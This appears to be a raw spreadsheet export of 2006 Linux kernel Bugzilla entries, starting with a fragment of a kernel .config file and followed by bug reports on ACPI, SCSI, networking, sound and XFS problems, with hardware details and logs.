CONFIG_VIDEO_VIDEOBUF=m CONFIG_VIDEO_TUNER=m CONFIG_VIDEO_BUF=m CONFIG_VIDEO_BTCX=m CONFIG_VIDEO_IR=m # # Graphics support # CONFIG_FB=y CONFIG_FB_CIRRUS=m CONFIG_FB_PM2=m # CONFIG_FB_PM2_FIFO_DISCONNECT is not set CONFIG_FB_CYBER2000=m CONFIG_FB_ASILIANT=y # CONFIG_FB_IMSTT is not set CONFIG_FB_RIVA=m CONFIG_FB_RIVA_I2C=y # CONFIG_FB_RIVA_DEBUG is not set CONFIG_FB_MATROX=m CONFIG_FB_MATROX_MILLENIUM=y CONFIG_FB_MATROX_MYSTIQUE=y CONFIG_FB_MATROX_G450=y CONFIG_FB_MATROX_G100=y CONFIG_FB_MATROX_I2C=m CONFIG_FB_MATROX_MAVEN=m CONFIG_FB_MATROX_MULTIHEAD=y CONFIG_FB_RADEON_OLD=m CONFIG_FB_RADEON=m CONFIG_FB_RADEON_I2C=y # CONFIG_FB_RADEON_DEBUG is not set CONFIG_FB_ATY128=m CONFIG_FB_ATY=m CONFIG_FB_ATY_CT=y CONFIG_FB_ATY_GX=y # CONFIG_FB_ATY_XL_INIT is not set CONFIG_FB_SIS=m CONFIG_FB_SIS_300=y CONFIG_FB_SIS_315=y CONFIG_FB_NEOMAGIC=m CONFIG_FB_KYRO=m CONFIG_FB_3DFX=m # CONFIG_FB_3DFX_ACCEL is not set CONFIG_FB_VOODOO1=m CONFIG_FB_TRIDENT=m # CONFIG_FB_TRIDENT_ACCEL is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y CONFIG_MDA_CONSOLE=m CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=m # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_TIMER=m CONFIG_SND_PCM=m CONFIG_SND_HWDEP=m CONFIG_SND_RAWMIDI=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_MPU401_UART=m CONFIG_SND_OPL3_LIB=m CONFIG_SND_VX_LIB=m CONFIG_SND_DUMMY=m CONFIG_SND_VIRMIDI=m CONFIG_SND_MTPAV=m CONFIG_SND_SERIAL_U16550=m CONFIG_SND_MPU401=m # # PCI devices # CONFIG_SND_AC97_CODEC=m CONFIG_SND_ALI5451=m CONFIG_SND_ATIIXP=m CONFIG_SND_AU8810=m CONFIG_SND_AU8820=m CONFIG_SND_AU8830=m CONFIG_SND_AZT3328=m CONFIG_SND_BT87X=m CONFIG_SND_CS46XX=m CONFIG_SND_CS46XX_NEW_DSP=y CONFIG_SND_CS4281=m CONFIG_SND_EMU10K1=m CONFIG_SND_KORG1212=m CONFIG_SND_MIXART=m CONFIG_SND_NM256=m CONFIG_SND_RME32=m CONFIG_SND_RME96=m CONFIG_SND_RME9652=m CONFIG_SND_HDSP=m CONFIG_SND_TRIDENT=m CONFIG_SND_YMFPCI=m CONFIG_SND_ALS4000=m CONFIG_SND_CMIPCI=m CONFIG_SND_ENS1370=m CONFIG_SND_ENS1371=m CONFIG_SND_ES1938=m CONFIG_SND_ES1968=m CONFIG_SND_MAESTRO3=m CONFIG_SND_FM801=m CONFIG_SND_FM801_TEA575X=m CONFIG_SND_ICE1712=m CONFIG_SND_ICE1724=m CONFIG_SND_INTEL8X0=m CONFIG_SND_INTEL8X0M=m CONFIG_SND_SONICVIBES=m CONFIG_SND_VIA82XX=m CONFIG_SND_VX222=m # # ALSA USB devices # CONFIG_SND_USB_AUDIO=m # # PCMCIA devices # # # Open Sound System # CONFIG_SOUND_PRIME=m CONFIG_SOUND_BT878=m CONFIG_SOUND_CMPCI=m CONFIG_SOUND_EMU10K1=m # CONFIG_MIDI_EMU10K1 is not set CONFIG_SOUND_FUSION=m CONFIG_SOUND_CS4281=m CONFIG_SOUND_ES1370=m CONFIG_SOUND_ES1371=m CONFIG_SOUND_ESSSOLO1=m CONFIG_SOUND_MAESTRO=m CONFIG_SOUND_MAESTRO3=m CONFIG_SOUND_ICH=m CONFIG_SOUND_SONICVIBES=m CONFIG_SOUND_TRIDENT=m CONFIG_SOUND_MSNDCLAS=m CONFIG_MSNDCLAS_INIT_FILE="m" CONFIG_MSNDCLAS_PERM_FILE="m" CONFIG_SOUND_MSNDPIN=m CONFIG_MSNDPIN_INIT_FILE="m" CONFIG_MSNDPIN_PERM_FILE="m" CONFIG_SOUND_VIA82CXXX=m # CONFIG_MIDI_VIA82CXXX is not set # CONFIG_SOUND_OSS is not set CONFIG_SOUND_TVMIXER=m CONFIG_SOUND_ALI5455=m CONFIG_SOUND_FORTE=m CONFIG_SOUND_RME96XX=m CONFIG_SOUND_AD1980=m # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m # CONFIG_USB_EHCI_SPLIT_ISO is not set CONFIG_USB_EHCI_ROOT_HUB_TT=y CONF</t>
  </si>
  <si>
    <t>PnPACPI problems with new resource manager - Fujitsu Lifebook C-1020</t>
  </si>
  <si>
    <t>2006-04-02 06:32 UTC</t>
  </si>
  <si>
    <t>Michael Karcher</t>
  </si>
  <si>
    <t>2007-03-10 21:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Debian Hardware Environment: Fujitsu Lifebook C1020 Software Environment: Problem Description: ACPI Plug'n'play fails to enable the parallel port after S3 with &gt; ACPI Error (exoparg2-0397): Index value (000000005) beyond package end (4) [20060127] &gt; ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.PCI0.PIB_.SIOD.PSRS] (Node c144e420), AE_AML_PACKAGE_LIMIT &gt; ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.PCI0.PIB_.SIOD.ECP_._SRS] (Node c144e580), AE_AML_PACKAGE_LIMIT &gt; pnp: Failed to activate device 00:0a. The cause of this problem seem to be the PSRS function on setting the DMA value trying to set dma channel 5. This should not happen, as the only allowed channels are 0, 1 and 3. The DSDT (attached) looks for the DMA channel mask byte at offset 0x14 in the resource buffer passed to _SRS. The new abstraction layer of the resource manager puts in the 3-byte-version of the interrupt descriptor at offset 8, so everything afterwards is shifted one byte, so the DSDT does not read the DMA mask byte now at 0x15, but the resource descriptor type byte 0x2A, it then uses FindSetLeftBit to find the number of the highest (and it should be only) set bit in this byte, which is 5. Steps to reproduce: Reproducable only on the given hardware, error message appears after entering S3</t>
  </si>
  <si>
    <t>Kernel Panic (tc filter delete panic)</t>
  </si>
  <si>
    <t>2.6.17.4</t>
  </si>
  <si>
    <t>2006-04-03 04:26 UTC</t>
  </si>
  <si>
    <t>Badalian Slava</t>
  </si>
  <si>
    <t>2008-01-28 22:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: in 2.6.15.x not see. Distribution: Slackware 10.2 updated to current Hardware Environment: 00:00.0 Host bridge: Intel Corporation 915G/P/GV/GL/PL/910GL Processor to I/O Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev d3) 00:1f.0 ISA bridge: Intel Corporation 82801FB/FR (ICH6/ICH6R) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) 00:1f.2 IDE interface: Intel Corporation 82801FR/FRW (ICH6R/ICH6RW) SATA Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) 01:09.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 01:0a.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 01:0b.0 VGA compatible controller: ATI Technologies Inc 3D Rage II+ 215GTB [Mach64 GTB] (rev 9a) Software Environment: Problem Description: now 2.6.16.1 and normaly work 2 days. in 2.6.16.0 - have 2 kernel panic for 1 week. This last Server used how Bridge + Traffic Shaper... have more than 10k tc rules (used hash tables) and over 4k iptables rules. TC used: htc red class, sfq qdisc, u32 filter only iptables use psydev module. Channel have 60 mbs any time. 2k+ clients. Steps to reproduce: I try attach .config and screenshots (from photo)</t>
  </si>
  <si>
    <t>Loadable Security Modules (LSM)</t>
  </si>
  <si>
    <t>Undefined ref to `hrtimer_adjust_softirq_prio' with realtime patch</t>
  </si>
  <si>
    <t>2.6.16.1 with patch 2.6.16-rt12</t>
  </si>
  <si>
    <t>2006-04-04 07:00 UTC</t>
  </si>
  <si>
    <t>Steve Skarda</t>
  </si>
  <si>
    <t>2006-05-08 06:44 UTC</t>
  </si>
  <si>
    <t>Patch 2.6.16-rt1 works great. Patch 2.6.16-rt12 gives error. Not sure about those in between. Distribution: Ubuntu Hardware Environment: Pentium 4 3.2Ghz/ht Problem Description: Tried to compile kernel with realtime premption. Have the following error on compile: LD .tmp_vmlinux1 kernel/built-in.o: In function `hrtimer_run_queues': : undefined reference to `hrtimer_adjust_softirq_prio' make[1]: *** [.tmp_vmlinux1] Error 1 make[1]: Leaving directory `/usr/src/linux-2.6.16rt12' make: *** [stamp-build] Error 2 Steps to reproduce: Followed instructions at http://ubuntustudio.com/wiki/index.php/Breezy:Vanilla_Kernel_With_Realtime_Preemption Only change was that I used 2.6.16.1 kernel</t>
  </si>
  <si>
    <t>loop in acpi initialisation code</t>
  </si>
  <si>
    <t>2006-04-04 07:10 UTC</t>
  </si>
  <si>
    <t>Xavier Bru</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Redhat/Bull Hardware Environment: Bull Novascale Software Environment: Problem Description: Boot in ACPI interpreter revision 20060127 at kernel initialisation time. This is due to pci buses that are described in the configuration, but not available in limited configurations. These buses have a _STA method, but no _INI method. With 2.6.15, the _STA method is run, and as the bus is not present, the bus and all devices behind it are ignored. With 2.6.16 optimisations, as no _INI method is provided for the bus, _STA method is not run, and then we loop when executing methods for devices behind the not present bus. Having a look to ACPI specification, I could find nowhere the restriction that _STA method is called only when an _INI method is provided for the device: "6.5.1 _INI (Init) ... If the _STA method indicates that the device is present, OSPM will evaluate the _INI for the device (if the _INI method exists) and will examine each of the children of the device for _INI methods. If the _STA method indicates that the device is not present, OSPM will not run the _INI and will not examine the children of the device for _INI methods. " kernel does Steps to reproduce: Just boot the system.</t>
  </si>
  <si>
    <t>OOPS in snd_pcm_oss</t>
  </si>
  <si>
    <t>2.6.17-rc1</t>
  </si>
  <si>
    <t>2006-04-04 08:13 UTC</t>
  </si>
  <si>
    <t>2006-06-27 09:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: Slackware-current Hardware Environment: GIGABYTE 8I848E(ICH4) P4 1.8 512 MB RAM HDD 120GB SEAGATE Software Environment: KDE 3.5.2, XOrg 6.9, glibc 2.3.6 Problem Description: OOPS in snd_pcm_oss on exit fish fillets ng (http://fillets.sf.net/) Steps to reproduce: Exit fish fillets v 0.7.0</t>
  </si>
  <si>
    <t>commit b408cbc704352eccee301e1103b23203ba1c3a0e kills Cardbus bridge interrupts</t>
  </si>
  <si>
    <t>2006-04-05 20:12 UTC</t>
  </si>
  <si>
    <t>2006-06-02 07:29 UTC</t>
  </si>
  <si>
    <t>Linus Torvalds</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: SuSE Hardware Environment: HP ze1115 notebook with AMD Duron CPU Software Environment: gcc 4.0.2 Problem Description: Cardbus peripherals do not work. The dmesg output shows the following: ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt for device 0000:00:0a.0 disabled yenta_cardbus: probe of 0000:00:0a.0 failed with error -12 I used 'git bisect' to localize the problem, which turned out to be the changes in commit b408cbc704352eccee301e1103b23203ba1c3a0e, which was made on March 23. When I revert this patch, my cardbus system behaves normally and the cardbus controller initialization is ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 Yenta: CardBus bridge found at 0000:00:0a.0 [103c:0022] Yenta O2: res at 0x94/0xD4: 00/ea Yenta O2: enabling read prefetch/write burst Yenta: ISA IRQ mask 0x0038, PCI irq 11 Socket status: 30000821 The memory map at the beginning of the dmesg buffer is BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000023ff0000 (usable) BIOS-e820: 0000000023ff0000 - 0000000023ffffc0 (ACPI data) BIOS-e820: 0000000023ffffc0 - 0000000024000000 (ACPI NVS) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) 575MB LOWMEM available. On node 0 totalpages: 147440 DMA zone: 4096 pages, LIFO batch:0 Normal zone: 143344 pages, LIFO batch:31 Steps to reproduce: Happens every reboot.</t>
  </si>
  <si>
    <t>ESP DMA and sbus (mainly in sparc32 but in sparc64 too)</t>
  </si>
  <si>
    <t>2006-04-07 02:19 UTC</t>
  </si>
  <si>
    <t>JKB</t>
  </si>
  <si>
    <t>2006-07-05 14:43 UTC</t>
  </si>
  <si>
    <t>Martin Habets</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.32. Distribution: debian. Hardware Environment: SparcSTATION 20 (sun4m), 448 MBytes of RAM, esp (FAS100A), Mbus SuperSPARC SM71. Software Environment: very basic kernel with built-in raid1, UP. Problem Description: When traffic on SCSI bus is high, esp hangs and freezes the system with : Apr 6 20:36:01 lebegue kernel: esp0: DMA error a440030e Apr 6 20:36:01 lebegue kernel: esp0: Resetting scsi bus Apr 6 20:36:01 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:01 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:01 lebegue kernel: esp0: Warning, live target 3 not responding to selection. Apr 6 20:36:01 lebegue kernel: esp0: Warning, live target 1 not responding to selection. Apr 6 20:36:02 lebegue kernel: esp0: Resetting scsi bus Apr 6 20:36:02 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:02 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:02 lebegue kernel: esp0: Warning, live target 3 not responding to selection. Apr 6 20:36:02 lebegue kernel: esp0: Warning, live target 1 not responding to selection. Apr 6 20:36:03 lebegue kernel: esp0: Resetting scsi bus Apr 6 20:36:03 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:03 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:03 lebegue kernel: esp0: Warning, live target 3 not responding to selection. Apr 6 20:36:03 lebegue kernel: esp0: Resetting scsi bus Apr 6 20:36:03 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:03 lebegue kernel: esp0: SCSI bus reset interrupt Apr 6 20:36:13 lebegue kernel: sd 0:0:3:0: scsi: Device offlined - not ready after error recovery Steps to reproduce: 1/ use a SparcSTATION (sun4c, sun4m, maybe sun4d but I don't have any sun4d...), or UltraSPARC with Sbus and ESP FAS100A (for example U1, the U1E works fine with HME ESP adapter) ; 2/ connect on the internal SCSI bus one or two disks 3/ stress the SCSI bus (for example with raid1) 4/ wait for the crash... Several hours with SuperSPARC-II on a SS20, a few minutes with HyperSPARC/200 ;-) Observations: the frequency of this bug is greater with HyperSPARC cpu than SuperSPARC. I think that the bug comes from DMA/VDMA/Sbus support, but I don't find any mistake in the sources... I have seen this bug on several stations (SS5 with MicroSPARC-II, SS20 with SuperSPARC and HyperSPARC UP, U1 with UltraSPARC-I). Regards, JKB</t>
  </si>
  <si>
    <t>Errors in headers, typedef's and function used outside __KERNEL__ scope</t>
  </si>
  <si>
    <t>2006-04-07 04:33 UTC</t>
  </si>
  <si>
    <t>Jerry Lundstr</t>
  </si>
  <si>
    <t>2006-08-21 00:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Lunar Linux Problem Description: There are errors in the kernel headers. Typedef's and functions that are defined inside the __KERNEL__ scope are used elsewhere outside the __KERNEL__ scope which produce compilation errors when including the headers. I found this in linux/input.h, linux/bitops.h and asm/processor.h .</t>
  </si>
  <si>
    <t>NULL Pointer lapbether</t>
  </si>
  <si>
    <t>2.6.14  2.6.15 2.6.16</t>
  </si>
  <si>
    <t>2006-04-08 08:11 UTC</t>
  </si>
  <si>
    <t>2006-04-23 16:21 UTC</t>
  </si>
  <si>
    <t>Problem Description: Lapbether generate an oops, when I try to receive or sends packets over X25. I think that the problem was introduced by this patch: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=86e65da9c1fc6fb421b9f796b597b3eced6b55ab The line skb-&gt;input_dev = skb-&gt;dev = dev; was removed from x25devices.h causing all drivers using x25_type_trans() to crash, because skb-&gt;dev stay unintialized. I think this line should have been replaced by skb-&gt;dev=dev; PS: Sorry for my bad english</t>
  </si>
  <si>
    <t>sysfs support broken for SAA7146A / stradis module loaded without stradis hardware</t>
  </si>
  <si>
    <t>2006-04-08 08:14 UTC</t>
  </si>
  <si>
    <t>2006-11-12 11:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 (an RC-version) Distribution: Debian Hardware Environment: Cinergy 1200 DVB-C card Software Environment: Problem Description: 1. /dev/dvb and /sys/class/dvb are empty 2. There is such a line in /var/log/messages: Apr 8 07:47:35 localhost kernel: videodev: "SAA7146A" has no release callback. Please fix your driver for proper sysfs support, see http://lwn.net/Articles/36850/ See also: bug 3209</t>
  </si>
  <si>
    <t>sbp2: scsi_add_device failed. IEEE1394 HD is not working anymore.</t>
  </si>
  <si>
    <t>2006-04-08 09:30 UTC</t>
  </si>
  <si>
    <t>Vanei Heidemann</t>
  </si>
  <si>
    <t>2006-06-07 06:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Slackware 10.2 Hardware Environment: Notebook Pentium 4 3.2HT Software Environment: Kernel 2.6.16 (.1, .2) Problem Description: I have external HD (Toshiba MK8025GAS) connected through IEEE1394, using a Vipower VPA-25289 enclosure. With kernel 2.6.15 I can access it through /dev/sda. With 2.6.16, I can do it anymore. The dmesg output is: ieee1394: The root node is not cycle master capable; selecting a new root node a nd resetting... ieee1394: Error parsing configrom for node 0-00:1023 ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: Node added: ID:BUS[0-00:1023] GUID[0050770e000042c0] ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) ieee1394: sbp2: Try serialize_io=0 for better performance scsi0 : SBP-2 IEEE-1394 ieee1394: sbp2: Logged into SBP-2 device ieee1394: Node 0-00:1023: Max speed [S400] - Max payload [2048] ieee1394: sbp2: aborting sbp2 command 0:0:0:0: command: cdb[0]=0x12: 12 00 00 00 24 00 ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node suspended: ID:BUS[0-00:1023] GUID[0050770e000042c0] ieee1394: sbp2: aborting sbp2 command 0:0:0:0: command: cdb[0]=0x0: 00 00 00 00 00 00 ieee1394: sbp2: reset requested 0:0:0:0: scsi: Device offlined - not ready after error recovery ieee1394: sbp2: scsi_add_device failed Steps to reproduce: Connect a external HD through IEEE1394.</t>
  </si>
  <si>
    <t>Megaraid driver is more recent for my hardware</t>
  </si>
  <si>
    <t>2.4.8 -&gt; 2.6.16.1</t>
  </si>
  <si>
    <t>2006-04-08 09:50 UTC</t>
  </si>
  <si>
    <t>Catherine Rambo</t>
  </si>
  <si>
    <t>2008-04-22 06:07 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-other</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Sarge Hardware Environment: Hp Netserver LH3 with Netraid (driver Megaraid) Software Environment: Without, I try to update Problem Description: Hello from France, I install with my CD, Debian with a 2.4.8 Kernel. My SCSI card was ok with the megaraid driver. I try to update the kernel with the 2.6.16.1 version. But after the boot hang on my Scsi card. I read this, a new driver for the megaraid is present on the 2.6 kernel. And it doesn't work with my "old" card. How can I copy, compile, .... the megaraid driver of 2.4 kernel in 2.6 kenel. I start in the world linux and kernel. Can you explain with more sentence Thanks Steps to reproduce:</t>
  </si>
  <si>
    <t>alim15x3.c driver need to update</t>
  </si>
  <si>
    <t>ALL Linux 2.4.x &amp; 2.6.x</t>
  </si>
  <si>
    <t>2006-04-09 00:00 UTC</t>
  </si>
  <si>
    <t>KAI.HSU</t>
  </si>
  <si>
    <t>2006-08-03 05:05 UTC</t>
  </si>
  <si>
    <t>6359 6360</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: ALL Linux kernel Hardware Environment: ULI M-1573 south Bridge chip Software Environment: Standard Linux Kenrel Problem Description: The alim15x3.c havn't been update for 3 years. Recently when we use this "ULI M1573" south bridge chip found that can't mount CDROM(VCD) smoothly, must waiting for a long time. After I check the "ULI M1573" south bridge datasheet, I found the reason. The reason is the "ULI M1573" version in the Linux is "0xC7" not "0xC4" anymore So I was modified the source than it was successed. Steps to reproduce: Origianl kerenl source as below: ================================ if(m5229_revision &lt;= 0x20) tmpbyte = (tmpbyte &amp; (~0x02)) | 0x01; else tmpbyte |= 0x01; Below is modify source: ================================= if(m5229_revision &lt;= 0x20) tmpbyte = (tmpbyte &amp; (~0x02)) | 0x01; else if(m5229_revision == 0xC7) tmpbyte |= 0x03; else tmpbyte |= 0x01;</t>
  </si>
  <si>
    <t>Oversized Ethernet frame spanned multiple buffers</t>
  </si>
  <si>
    <t>2.6.16.1 + suspend2-2.2.4</t>
  </si>
  <si>
    <t>2006-04-10 05:48 UTC</t>
  </si>
  <si>
    <t>2007-11-02 09:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.6 was the previous version running here Distribution: Debian Sarge - custom kernel=vanilla+suspend2 Hardware Environment: # lspci 0000:00:00.0 Host bridge: Intel Corp. 82852/855GM Host Bridge (rev 02) 0000:00:00.1 System peripheral: Intel Corp. 855GM/GME GMCH Memory I/O Control Re gisters (rev 02) 0000:00:00.3 System peripheral: Intel Corp. 855GM/GME GMCH Configuration Process Registers (rev 02) 0000:00:02.0 VGA compatible controller: Intel Corp. 82852/855GM Integrated Graph ics Device (rev 02) 0000:00:02.1 Display controller: Intel Corp. 82852/855GM Integrated Graphics Dev ice (rev 02) 0000:00:1d.0 USB Controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) US B UHCI Controller #1 (rev 03) 0000:00:1d.1 USB Controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) US B UHCI Controller #2 (rev 03) 0000:00:1d.7 USB Controller: Intel Corp. 82801DB/DBM (ICH4/ICH4-M) USB 2.0 EHCI Controller (rev 03) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev 83) 0000:00:1f.0 ISA bridge: Intel Corp. 82801DBM LPC Interface Controller (rev 03) 0000:00:1f.1 IDE interface: Intel Corp. 82801DBM (ICH4) Ultra ATA Storage Contro ller (rev 03) 0000:00:1f.3 SMBus: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Contr oller (rev 03) 0000:00:1f.5 Multimedia audio controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4 -L/ICH4-M) AC'97 Audio Controller (rev 03) 0000:00:1f.6 Modem: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 03) 0000:01:01.0 Network controller: Intel Corp. PRO/Wireless 2200BG (rev 05) 0000:01:02.0 Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev 8b) 0000:01:03.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controlle r (rev 02) # lspci -s 01:02.0 -vv 0000:01:02.0 Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev 8b) Subsystem: Unknown device 1631:d004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Step ping+ SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort - &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (750ns min, 2000ns max), Cache Line Size: 0x04 (16 bytes) Interrupt: pin A routed to IRQ 3 Region 0: I/O ports at c000 [size=256] Region 1: Memory at e0000000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot +,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- grep RHINE /boot/config-2.6.16.1-ss2.2.4-pm.1 CONFIG_VIA_RHINE=m # CONFIG_VIA_RHINE_MMIO is not set # cat /proc/cpuinfo |head -5 processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 13 model name : Intel(R) Pentium(R) M processor 1.50GHz stepping : 8 cpu MHz : 187.500 cache size : 2048 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat c lflush dts acpi mmx fxsr sse sse2 ss tm pbe nx est tm2 bogomips : 2991.16 Software Environment: Problem Description: while moving stuff on a nfs volume, with this kernel I started seeing a bunch of lines like the following: [kernel] eth0: Oversized Ethernet frame spanned multiple buffers, entry 0x3 length 0 status 00000600! network/nfs link suffers a brief hiccup, but then it goes on normally. Steps to reproduce: make lot of network traffic</t>
  </si>
  <si>
    <t>Would like category for "Early Userspace (klibc/kinit)"</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>2006-04-10 09:19 UTC</t>
  </si>
  <si>
    <t>H. Peter Anvin</t>
  </si>
  <si>
    <t>2006-04-10 11:16 UTC</t>
  </si>
  <si>
    <t>Early userspace (a.k.a. klibc/kinit) is getting close to getting merged into the -mm tree. It would be really good to have a central place to maintain a bug list already at this stage, and this is the natural place. I (hpa@zytor.com) should be the category owner.</t>
  </si>
  <si>
    <t>Nforce3 250Gb AGP not initialised</t>
  </si>
  <si>
    <t>2.6.16-mm2</t>
  </si>
  <si>
    <t>2006-04-11 11:09 UTC</t>
  </si>
  <si>
    <t>Tobe Deprez</t>
  </si>
  <si>
    <t>2008-09-22 16:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: all Hardware Environment: i386 Software Environment: linux Problem Description: agpgart (with amd64-agp) does not work with Nforce3 250Gb. But when it is initialised (by starting Windows) before starting linux, it works correctly. Dmesg prints "Aperture base &gt; 4G" when it's not initialized. The pci config of the AGP bridge has the following differences before and after Windows has been started: (before) (after) 0x1f: 22 02 0x53: 00 f0 0x55: 00 f0 0x56: 00 ff 0x57: 10 f7 0xdf: 07 f7 Simply changing this and reloading amd64-agp module doesn't work. Steps to reproduce: 1.Turn computer off 2.Turn it on again 3.Start linux 4.It reports "Aperture base &gt; 4G"; AGP does not work 5.Reboot to windows 6.Reboot (without turning off) 7.AGP works correctly</t>
  </si>
  <si>
    <t>XFS corruption with Linux 2.6.16</t>
  </si>
  <si>
    <t>2.6.16.4</t>
  </si>
  <si>
    <t>2006-04-12 07:26 UTC</t>
  </si>
  <si>
    <t>2006-07-16 02:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: no later kernel version tested Distribution: Debian Linux Etch/Sid Hardware Environment: IBM ThinkPad T23, P3 with 1.13 GHz, 384 MB RAM Software Environment: Kernel 2.6.16.1, kernel 2.6.16.4 with sws2 2.2.4 Problem Description: I get severe XFS corruption on random occasions. It happens with my Debian Linux root partition. /home on a different XFS partition was not yet affected (lucky me). And OpenSUSE 10 on yet another partition was not affected to. I used OpenSUSE only to recover my broken Debian partition tough. I have no reproducible pattern do that and it will be triggered, it just happens. I got XFS corruption three times within 1 week: 1) I don't know when it happened, but I noticed it as dpkg complained about several errors in /var/lib/dpkg/available. I first suspected that it was corrupted due to some bug in Debian package management, but then found out that it just contained lots of garbage characters at the end of the file. In the middle of the file some text where missing or duplicated. I booted to OpenSUSE 10 and xfs_check reported errors beyond that usual stuff about old deleted files (agi unlinked node or something like that) that can easily be fixed. It has been just a few errors and I restored the "available" via "apt-cache dumpavail". 2) Next time I wanted to start a mindmap in kdissert, a mind mapping tool for KDE, which I used with KDE 3.5.2. I just clicked around a bit, added an item or two and then the machine become unresponsive and finally the X.org (modular X.org 7 from Debian experimental) died. Then the machine seemed to be locked up completely. I switched it off finally. The machine didnt boot again, but GRUB found its menu.lst and I managed to boot into OpenSUSE 10. OpenSUSE (Kernel 2.6.13.5 or something like that) didn't manage to mount my root partition: error 990. I do not remember what happened with xfs_check... I think it reported tons of errors or I started with 